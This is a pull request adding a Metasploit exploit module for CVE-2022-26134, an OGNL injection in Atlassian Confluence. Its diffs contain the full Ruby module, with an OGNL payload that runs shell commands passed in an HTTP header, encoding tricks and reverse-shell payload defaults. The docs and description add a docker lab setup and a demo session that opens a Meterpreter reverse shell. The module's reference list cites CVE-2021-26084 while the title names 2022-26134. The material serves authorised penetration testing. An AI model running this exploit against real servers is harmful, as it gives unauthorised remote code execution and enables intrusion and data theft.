### PR TITLE
Add Exploit for CVE-2022-26134 (Confluence RCE)

### DIFF
--- a/documentation/modules/exploit/multi/http/atlassian_confluence_namespace_ognl_injection.md
+++ b/documentation/modules/exploit/multi/http/atlassian_confluence_namespace_ognl_injection.md
@@ -2,10 +2,8 @@
 This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to evaluate
 an OGNL expression resulting in OS command execution.
 
-Confluence versions up to and including 7.18 are technically vulnerable to the OGNL injection flaw. However, versions
-after 7.14 (that is 7.15 and later) are not exploitable by this module for code execution due to the restrictions on the
-OGNL execution environment. Version 7.13 (affected) was the latest Long-Term-Support (LTS) release at the time this
-vulnerability was disclosed.
+Confluence versions up to and including 7.18 are vulnerable to this OGNL injection flaw. For more complete information
+on affected and fixed versions, see [CONFSERVER-79000][1].
 
 ### Setup
 
@@ -88,3 +86,5 @@ System Language : en_US
 Meterpreter     : python/linux
 meterpreter > 
 ```
+
+[1]: https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro

--- a/documentation/modules/exploit/multi/http/atlassian_confluence_namespace_ognl_injection.md
+++ b/documentation/modules/exploit/multi/http/atlassian_confluence_namespace_ognl_injection.md
@@ -1,4 +1,11 @@
 ## Vulnerable Application
+This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to evaluate
+an OGNL expression resulting in OS command execution.
+
+Confluence versions up to and including 7.18 are technically vulnerable to the OGNL injection flaw. However, versions
+after 7.14 (that is 7.15 and later) are not exploitable by this module for code execution due to the restrictions on the
+OGNL execution environment. Version 7.13 (affected) was the latest Long-Term-Support (LTS) release at the time this
+vulnerability was disclosed.
 
 ### Setup
 

--- a/documentation/modules/exploit/multi/http/atlassian_confluence_namespace_ognl_injection.md
+++ b/documentation/modules/exploit/multi/http/atlassian_confluence_namespace_ognl_injection.md
@@ -1,0 +1,83 @@
+## Vulnerable Application
+
+### Setup
+
+1. Create a new `docker-compose.yml` file with the contents below.
+2. Startup the container using `docker-compose up`
+3. Navigate to the HTTP service running on port 8090
+4. Acquire and provide an evaluation license
+5. When prompted, setup a standalone / non-clustered system
+6. Configure the database settings
+    1. Select "By connection string", then Database URL: `jdbc:postgresql://postgresql:5432/confdb`
+    2. Username and password are both `confdb`
+7. Setup takes a few minutes
+8. When prompted, select "Empty Site"
+9. Select "Manage users and groups within Confluence"
+10. Create an account, it **will not** be needed for exploitation
+11. Once setup has completed select "Start" and set a space name to something
+
+#### Docker Compose File
+
+```
+version: '3'
+
+services:
+  postgresql:
+    image: postgres:11
+    environment:
+      POSTGRES_DB: confdb
+      POSTGRES_USER: confdb
+      POSTGRES_PASSWORD: confdb
+    ports:
+      - '5432:5432'
+
+  confluence-server:
+    depends_on:
+      - postgresql
+    image: atlassian/confluence:7.13.0
+    ports:
+      - '8090:8090'
+      - '8091:8091'
+```
+
+## Verification Steps
+
+1. Follow the steps from the Setup section to create a test instance
+2. Start msfconsole
+3. Run: `use exploit/multi/http/atlassian_confluence_namespace_ognl_injection'
+4. Set the `RHOSTS`, `PAYLOAD` and payload-related options
+5. Run the module
+
+## Options
+
+## Scenarios
+
+### Confluence 7.13.0 in [Docker]
+
+```
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set RHOSTS 192.168.159.100
+RHOSTS => 192.168.159.100
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
+PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set LHOST 192.168.159.128
+LHOST => 192.168.159.128
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > check
+[+] 192.168.159.100:8090 - The target is vulnerable. Successfully tested OGNL injection.
+msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[!] AutoCheck is disabled, proceeding with exploitation
+[*] Executing cmd/unix/python/meterpreter/reverse_tcp (Unix Command)
+[*] Sending stage (40132 bytes) to 192.168.159.100
+[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.100:42050) at 2022-06-03 17:14:41 -0400
+
+meterpreter > getuid
+Server username: confluence
+meterpreter > sysinfo
+Computer        : 5052c5eebf8a
+OS              : Linux 5.15.0-35-generic #36-Ubuntu SMP Sat May 21 02:24:07 UTC 2022
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > 
+```

--- a/documentation/modules/exploit/multi/http/atlassian_confluence_namespace_ognl_injection.md
+++ b/documentation/modules/exploit/multi/http/atlassian_confluence_namespace_ognl_injection.md
@@ -51,7 +51,7 @@ services:
 
 1. Follow the steps from the Setup section to create a test instance
 2. Start msfconsole
-3. Run: `use exploit/multi/http/atlassian_confluence_namespace_ognl_injection'
+3. Run: `use exploit/multi/http/atlassian_confluence_namespace_ognl_injection`
 4. Set the `RHOSTS`, `PAYLOAD` and payload-related options
 5. Run the module
 

--- a/modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb
+++ b/modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb
@@ -28,6 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'References' => [
           ['CVE', '2021-26084'],
+          ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro'],
           ['URL', 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py'],
           ['URL', 'https://github.com/jbaines-r7/through_the_wire'],
           ['URL', 'https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis']
@@ -76,19 +77,16 @@ class MetasploitModule < Msf::Exploit::Remote
     version = get_confluence_version
     return CheckCode::Unknown unless version
 
+    vprint_status("Detected Confluence version: #{version}")
     header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"
     res = inject_ognl('', header: header) # empty command works for testing, the header will be set
 
     return CheckCode::Unknown unless res
 
     unless res && res.headers.include?(header)
-      # version 7.15 is technically vulnerable to the OGNL injection but not exploitable
-      return CheckCode::Detected("Detected Confluence version: #{version}") if version >= Rex::Version.new('7.15')
-
       return CheckCode::Safe('Failed to test OGNL injection.')
     end
 
-    vprint_status("Response header: #{res.headers[header]}")
     CheckCode::Vulnerable('Successfully tested OGNL injection.')
   end
 
@@ -109,10 +107,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    version = get_confluence_version
-    fail_with(Failure::Unknown, 'Failed to fingerprint the target server.') unless version
-    fail_with(Failure::NoTarget, "Confluence version #{version} is not exploitable.") if version >= Rex::Version.new('7.15')
-
     print_status("Executing #{payload_instance.refname} (#{target.name})")
 
     case target['Type']
@@ -135,54 +129,10 @@ class MetasploitModule < Msf::Exploit::Remote
     res.headers[header]
   end
 
-  def encode_ognl(ognl)
-    # Check and fail if the command contains the follow bad characters:
-    #   ';' seems to terminates the OGNL statement
-    #   '/' causes the target to return an HTTP/400 error
-    #   '\' causes the target to return an HTTP/400 error (sometimes?)
-    #   '\r' ends the GET request prematurely
-    #   '\n' ends the GET request prematurely
-
-    bad_chars = %w[; \\ \r \n] # and maybe '/'
-    bad_chars.each do |c|
-      if ognl.include? c
-        print_error("Bad OGNL request: #{ognl}")
-        fail_with(Failure::BadConfig, "OGNL request cannot contain a '#{c}'")
-      end
-    end
-
-    # The following list of characters *must* be encoded or ORNL will asplode
-    encodable_chars = {
-      "%": '%25', # Always do this one first.  :-)
-      " ": '%20',
-      '"': '%22',
-      "#": '%23',
-      "'": '%27',
-      "<": '%3c',
-      ">": '%3e',
-      "?": '%3f',
-      "^": '%5e',
-      "`": '%60',
-      "{": '%7b',
-      "|": '%7c',
-      "}": '%7d'
-    }
-    # "\/":"%2f",       # Don't do this.  Just leave it front-slashes in as normal.
-    # ";": "%3b",       # Doesn't work.  Anyone have a cool idea for a workaround?
-    # "\\":"%5c",       # Doesn't work.  Anyone have a cool idea for a workaround?
-    # "\\":"%5c%5c",    # Doesn't work.  Anyone have a cool idea for a workaround?
-
-    encodable_chars.each do |k, v|
-      ognl.tr!(k.to_s, v)
-    end
-
-    ognl
-  end
-
   def inject_ognl(cmd, header:)
     send_request_cgi(
       'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, encode_ognl(ognl_payload(cmd, header: header)), 'dashboard.action'),
+      'uri' => normalize_uri(target_uri.path, Rex::Text.uri_encode(ognl_payload(cmd, header: header)), 'dashboard.action'),
       'headers' => { header => cmd }
     )
   end
@@ -190,14 +140,18 @@ class MetasploitModule < Msf::Exploit::Remote
   def ognl_payload(_cmd, header:)
     <<~OGNL.gsub(/^\s+/, '').tr("\n", '')
       ${
-        (#a=Class.forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval('
-          new java.lang.ProcessBuilder(
-            #{target['Platform'] == 'win' ? '"cmd.exe","/c"' : '"/bin/sh","-c"'},
-            com.opensymphony.webwork.ServletActionContext.getRequest().getHeader("#{header}")
-          ).start()
-        ')).(
-          @com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("#{header}",#a)
-        )
+        Class.forName("com.opensymphony.webwork.ServletActionContext")
+          .getMethod("getResponse",null)
+          .invoke(null,null)
+          .setHeader("#{header}",
+            Class.forName("javax.script.ScriptEngineManager")
+              .newInstance()
+              .getEngineByName("js")
+              .eval("java.lang.Runtime.getRuntime().exec([
+                #{target['Platform'] == 'win' ? "'cmd.exe','/c'" : "'/bin/sh','-c'"},
+                com.opensymphony.webwork.ServletActionContext.getRequest().getHeader('#{header}')
+              ]); '#{Faker::Internet.uuid}'")
+            )
       }
     OGNL
   end

--- a/modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb
+++ b/modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb
@@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Author' => [
           'Unknown', # exploited in the wild
           'bturner-r7',
-          'jbains-r7',
+          'jbaines-r7',
           'Spencer McIntyre'
         ],
         'References' => [

--- a/modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb
+++ b/modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb
@@ -155,7 +155,7 @@ class MetasploitModule < Msf::Exploit::Remote
     encodable_chars = {
       "%": '%25', # Always do this one first.  :-)
       " ": '%20',
-      "\"": '%22',
+      '"': '%22',
       "#": '%23',
       "'": '%27',
       "<": '%3c',
@@ -173,8 +173,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # "\\":"%5c%5c",    # Doesn't work.  Anyone have a cool idea for a workaround?
 
     encodable_chars.each do |k, v|
-      # ognl.gsub!(k,v)                     # TypeError wrong argument type Symbol (expected Regexp)
-      ognl.gsub!(k.to_s, v.to_s)
+      ognl.tr!(k.to_s, v)
     end
 
     ognl

--- a/modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb
+++ b/modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb
@@ -1,0 +1,215 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Atlassian Confluence Namespace OGNL Injection',
+        'Description' => %q{
+
+        },
+        'Author' => [
+
+        ],
+        'References' => [
+          ['CVE', '2021-26084'],
+          ['URL', 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py'],
+        ],
+        'DisclosureDate' => '2022-06-02',
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux', 'win'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_perl'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD,
+              'Type' => :cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Dropper',
+            {
+              'Platform' => 'win',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 8090
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def check
+    # todo: this needs to be fixed
+    token1 = rand_text_alphanumeric(8..16)
+    token2 = rand_text_alphanumeric(8..16)
+    token3 = rand_text_alphanumeric(8..16)
+
+    header = 'X-Cmd-Response'
+    res = inject_ognl("#{token1}'+'#{token2}'+'#{token3}", header: header)
+
+    return CheckCode::Unknown unless res
+
+    unless res.code == 200 && res.body.include?("#{token1}#{token2}#{token3}")
+      return CheckCode::Safe('Failed to test OGNL injection.')
+    end
+
+    CheckCode::Vulnerable('Successfully tested OGNL injection.')
+  end
+
+  def exploit
+    print_status("Executing #{payload_instance.refname} (#{target.name})")
+
+    case target['Type']
+    when :cmd
+      result = execute_command(payload.encoded)
+      if %w[ cmd/unix/generic cmd/windows/generic ].include?(payload_instance.refname)
+        print_status('Command output:')
+        print_line(result)
+      end
+    when :dropper
+      execute_cmdstager
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"
+    res = inject_ognl(cmd, header: header)
+
+    unless res && res.headers.include?(header)
+      fail_with(Failure::PayloadFailed, "Failed to execute command: #{cmd}")
+    end
+
+    vprint_good("Successfully executed command: #{cmd}")
+    res.headers[header]
+  end
+
+  def encode_ognl(ognl)
+    # Check and fail if the command contains the follow bad characters:
+    #   ';' seems to terminates the OGNL statement
+    #   '/' causes the target to return an HTTP/400 error
+    #   '\' causes the target to return an HTTP/400 error (sometimes?)
+    #   '\r' ends the GET request prematurely
+    #   '\n' ends the GET request prematurely
+
+    bad_chars = %w[; \\ \r \n]    # and maybe '/'
+    bad_chars.each do |c|
+      if ognl.include? c
+        print_error("Bad OGNL request: #{ognl}")
+        fail_with(Failure::BadConfig, "OGNL request cannot contain a '#{c}'")
+      end
+    end
+
+    # The following list of characters *must* be encoded or ORNL will asplode
+    encodable_chars = { "%": "%25",       # Always do this one first.  :-)
+                        " ": "%20",
+                        "\"":"%22",
+                        "#": "%23",
+                        "'": "%27",
+                        "<": "%3c",
+                        ">": "%3e",
+                        "?": "%3f",
+                        "^": "%5e",
+                        "`": "%60",
+                        "{": "%7b",
+                        "|": "%7c",
+                        "}": "%7d",
+                       #"\/":"%2f",       # Don't do this.  Just leave it front-slashes in as normal.
+                       #";": "%3b",       # Doesn't work.  Anyone have a cool idea for a workaround?
+                       #"\\":"%5c",       # Doesn't work.  Anyone have a cool idea for a workaround?
+                       #"\\":"%5c%5c",    # Doesn't work.  Anyone have a cool idea for a workaround?
+                      }
+
+    encodable_chars.each do |k,v|
+      #ognl.gsub!(k,v)                     # TypeError wrong argument type Symbol (expected Regexp)
+      ognl.gsub!("#{k}","#{v}")
+    end
+
+    ognl
+  end
+
+  def inject_ognl(cmd, header:)
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, encode_ognl(ognl_payload(cmd, header: header)), 'dashboard.action'),
+      'headers' => {
+        header => cmd
+      }
+    )
+  end
+
+  # Build an OGNL payload to execute the specified command. If *header* is specified, it's the name of an HTTP
+  # header that the command result will be placed into. In h
+  def ognl_payload(cmd, header:)
+    <<~OGNL.gsub(/^\s+/, '').tr("\n", '')
+      ${
+        (#a=@org.apache.commons.io.IOUtils@toString(
+          @java.lang.Runtime@getRuntime().exec(
+            @com.opensymphony.webwork.ServletActionContext@getRequest().getHeader("#{header}")
+          ).getInputStream(),"utf-8")
+        ).(
+          @com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("#{header}",#a)
+        )
+      }
+    OGNL
+  end
+
+  def target_shell
+    target['Platform'] == 'win' ? '"cmd.exe","/c"' : '"/bin/sh","-c"'
+  end
+end

--- a/modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb
+++ b/modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name' => 'Atlassian Confluence Namespace OGNL Injection',
         'Description' => %q{
           This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to
-          evalute an OGNL expression resulting in OS command execution.
+          evaluate an OGNL expression resulting in OS command execution.
         },
         'Author' => [
           'Unknown', # exploited in the wild
@@ -34,7 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2022-06-02',
         'License' => MSF_LICENSE,
-        'Platform' => ['unix', 'linux', 'win'],
+        'Platform' => ['unix', 'linux'],
         'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
         'Privileged' => false,
         'Targets' => [
@@ -43,10 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Platform' => 'unix',
               'Arch' => ARCH_CMD,
-              'Type' => :cmd,
-              'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/reverse_perl'
-              }
+              'Type' => :cmd
             }
           ],
           [
@@ -54,32 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Platform' => 'linux',
               'Arch' => [ARCH_X86, ARCH_X64],
-              'Type' => :dropper,
-              'DefaultOptions' => {
-                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
-              }
-            }
-          ],
-          [
-            'Windows Command',
-            {
-              'Platform' => 'win',
-              'Arch' => ARCH_CMD,
-              'Type' => :cmd,
-              'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
-              }
-            }
-          ],
-          [
-            'Windows Dropper',
-            {
-              'Platform' => 'win',
-              'Arch' => [ARCH_X86, ARCH_X64],
-              'Type' => :dropper,
-              'DefaultOptions' => {
-                'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'
-              }
+              'Type' => :dropper
             }
           ]
         ],

--- a/modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb
+++ b/modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb
@@ -73,12 +73,18 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
+    version = get_confluence_version
+    return CheckCode::Unknown unless version
+
     header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"
     res = inject_ognl('', header: header) # empty command works for testing, the header will be set
 
     return CheckCode::Unknown unless res
 
     unless res && res.headers.include?(header)
+      # version 7.15 is technically vulnerable to the OGNL injection but not exploitable
+      return CheckCode::Detected("Detected Confluence version: #{version}") if version >= Rex::Version.new('7.15')
+
       return CheckCode::Safe('Failed to test OGNL injection.')
     end
 
@@ -86,7 +92,27 @@ class MetasploitModule < Msf::Exploit::Remote
     CheckCode::Vulnerable('Successfully tested OGNL injection.')
   end
 
+  def get_confluence_version
+    return @confluence_version if @confluence_version
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'login.action')
+    )
+    return nil unless res&.code == 200
+
+    poweredby = res.get_xml_document.xpath('//ul[@id="poweredby"]/li[@class="print-only"]/text()').first&.text
+    return nil unless poweredby =~ /Confluence (\d+(\.\d+)*)/
+
+    @confluence_version = Rex::Version.new(Regexp.last_match(1))
+    @confluence_version
+  end
+
   def exploit
+    version = get_confluence_version
+    fail_with(Failure::Unknown, 'Failed to fingerprint the target server.') unless version
+    fail_with(Failure::NoTarget, "Confluence version #{version} is not exploitable.") if version >= Rex::Version.new('7.15')
+
     print_status("Executing #{payload_instance.refname} (#{target.name})")
 
     case target['Type']

--- a/modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb
+++ b/modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb
@@ -17,14 +17,20 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Atlassian Confluence Namespace OGNL Injection',
         'Description' => %q{
-
+          This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to
+          evalute an OGNL expression resulting in OS command execution.
         },
         'Author' => [
-
+          'Unknown', # exploited in the wild
+          'bturner-r7',
+          'jbains-r7',
+          'Spencer McIntyre'
         ],
         'References' => [
           ['CVE', '2021-26084'],
           ['URL', 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py'],
+          ['URL', 'https://github.com/jbaines-r7/through_the_wire'],
+          ['URL', 'https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis']
         ],
         'DisclosureDate' => '2022-06-02',
         'License' => MSF_LICENSE,
@@ -95,20 +101,16 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    # todo: this needs to be fixed
-    token1 = rand_text_alphanumeric(8..16)
-    token2 = rand_text_alphanumeric(8..16)
-    token3 = rand_text_alphanumeric(8..16)
-
-    header = 'X-Cmd-Response'
-    res = inject_ognl("#{token1}'+'#{token2}'+'#{token3}", header: header)
+    header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"
+    res = inject_ognl('', header: header) # empty command works for testing, the header will be set
 
     return CheckCode::Unknown unless res
 
-    unless res.code == 200 && res.body.include?("#{token1}#{token2}#{token3}")
+    unless res && res.headers.include?(header)
       return CheckCode::Safe('Failed to test OGNL injection.')
     end
 
+    vprint_status("Response header: #{res.headers[header]}")
     CheckCode::Vulnerable('Successfully tested OGNL injection.')
   end
 
@@ -117,11 +119,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     case target['Type']
     when :cmd
-      result = execute_command(payload.encoded)
-      if %w[ cmd/unix/generic cmd/windows/generic ].include?(payload_instance.refname)
-        print_status('Command output:')
-        print_line(result)
-      end
+      execute_command(payload.encoded)
     when :dropper
       execute_cmdstager
     end
@@ -147,7 +145,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #   '\r' ends the GET request prematurely
     #   '\n' ends the GET request prematurely
 
-    bad_chars = %w[; \\ \r \n]    # and maybe '/'
+    bad_chars = %w[; \\ \r \n] # and maybe '/'
     bad_chars.each do |c|
       if ognl.include? c
         print_error("Bad OGNL request: #{ognl}")
@@ -156,28 +154,29 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # The following list of characters *must* be encoded or ORNL will asplode
-    encodable_chars = { "%": "%25",       # Always do this one first.  :-)
-                        " ": "%20",
-                        "\"":"%22",
-                        "#": "%23",
-                        "'": "%27",
-                        "<": "%3c",
-                        ">": "%3e",
-                        "?": "%3f",
-                        "^": "%5e",
-                        "`": "%60",
-                        "{": "%7b",
-                        "|": "%7c",
-                        "}": "%7d",
-                       #"\/":"%2f",       # Don't do this.  Just leave it front-slashes in as normal.
-                       #";": "%3b",       # Doesn't work.  Anyone have a cool idea for a workaround?
-                       #"\\":"%5c",       # Doesn't work.  Anyone have a cool idea for a workaround?
-                       #"\\":"%5c%5c",    # Doesn't work.  Anyone have a cool idea for a workaround?
-                      }
+    encodable_chars = {
+      "%": '%25', # Always do this one first.  :-)
+      " ": '%20',
+      "\"": '%22',
+      "#": '%23',
+      "'": '%27',
+      "<": '%3c',
+      ">": '%3e',
+      "?": '%3f',
+      "^": '%5e',
+      "`": '%60',
+      "{": '%7b',
+      "|": '%7c',
+      "}": '%7d'
+    }
+    # "\/":"%2f",       # Don't do this.  Just leave it front-slashes in as normal.
+    # ";": "%3b",       # Doesn't work.  Anyone have a cool idea for a workaround?
+    # "\\":"%5c",       # Doesn't work.  Anyone have a cool idea for a workaround?
+    # "\\":"%5c%5c",    # Doesn't work.  Anyone have a cool idea for a workaround?
 
-    encodable_chars.each do |k,v|
-      #ognl.gsub!(k,v)                     # TypeError wrong argument type Symbol (expected Regexp)
-      ognl.gsub!("#{k}","#{v}")
+    encodable_chars.each do |k, v|
+      # ognl.gsub!(k,v)                     # TypeError wrong argument type Symbol (expected Regexp)
+      ognl.gsub!(k.to_s, v.to_s)
     end
 
     ognl
@@ -187,29 +186,22 @@ class MetasploitModule < Msf::Exploit::Remote
     send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, encode_ognl(ognl_payload(cmd, header: header)), 'dashboard.action'),
-      'headers' => {
-        header => cmd
-      }
+      'headers' => { header => cmd }
     )
   end
 
-  # Build an OGNL payload to execute the specified command. If *header* is specified, it's the name of an HTTP
-  # header that the command result will be placed into. In h
-  def ognl_payload(cmd, header:)
+  def ognl_payload(_cmd, header:)
     <<~OGNL.gsub(/^\s+/, '').tr("\n", '')
       ${
-        (#a=@org.apache.commons.io.IOUtils@toString(
-          @java.lang.Runtime@getRuntime().exec(
-            @com.opensymphony.webwork.ServletActionContext@getRequest().getHeader("#{header}")
-          ).getInputStream(),"utf-8")
-        ).(
+        (#a=Class.forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval('
+          new java.lang.ProcessBuilder(
+            #{target['Platform'] == 'win' ? '"cmd.exe","/c"' : '"/bin/sh","-c"'},
+            com.opensymphony.webwork.ServletActionContext.getRequest().getHeader("#{header}")
+          ).start()
+        ')).(
           @com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("#{header}",#a)
         )
       }
     OGNL
-  end
-
-  def target_shell
-    target['Platform'] == 'win' ? '"cmd.exe","/c"' : '"/bin/sh","-c"'
   end
 end


### PR DESCRIPTION
This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to evaluate an OGNL expression resulting in OS command execution.

~~Currently working on Confluence 7.13 and 7.14 on Linux, currently **not** working on Confluence 7.15-7.18 on Linux. The versions that are not working are due to restrictions in place on the OGNL execution context. The module will know that the command execution failed, and based on the version determine if it's technically vulnerable to the OGNL injection, just not exploitable for command execution.~~

Working on Confluence 7.18 now since 1a06f69f95d6c4751b799832a45620c3421af7bd. Tested on Confluence 7.4.0 and 7.18.0 (both using the atlassian docker image).

# Testing Steps

- [x] Follow the steps from the Setup section in the docs to create a test instance
- [x] Start msfconsole
- [x] Run: `use exploit/multi/http/atlassian_confluence_namespace_ognl_injection'
- [x] Set the `RHOSTS`, `PAYLOAD` and payload-related options
- [x] Run the module

# Demo
```
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set RHOSTS 192.168.159.100
RHOSTS => 192.168.159.100
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > check
[+] 192.168.159.100:8090 - The target is vulnerable. Successfully tested OGNL injection.
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[!] AutoCheck is disabled, proceeding with exploitation
[*] Executing cmd/unix/python/meterpreter/reverse_tcp (Unix Command)
[*] Sending stage (40132 bytes) to 192.168.159.100
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.100:42050) at 2022-06-03 17:14:41 -0400

meterpreter > getuid
Server username: confluence
meterpreter > sysinfo
Computer        : 5052c5eebf8a
OS              : Linux 5.15.0-35-generic #36-Ubuntu SMP Sat May 21 02:24:07 UTC 2022
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > 
```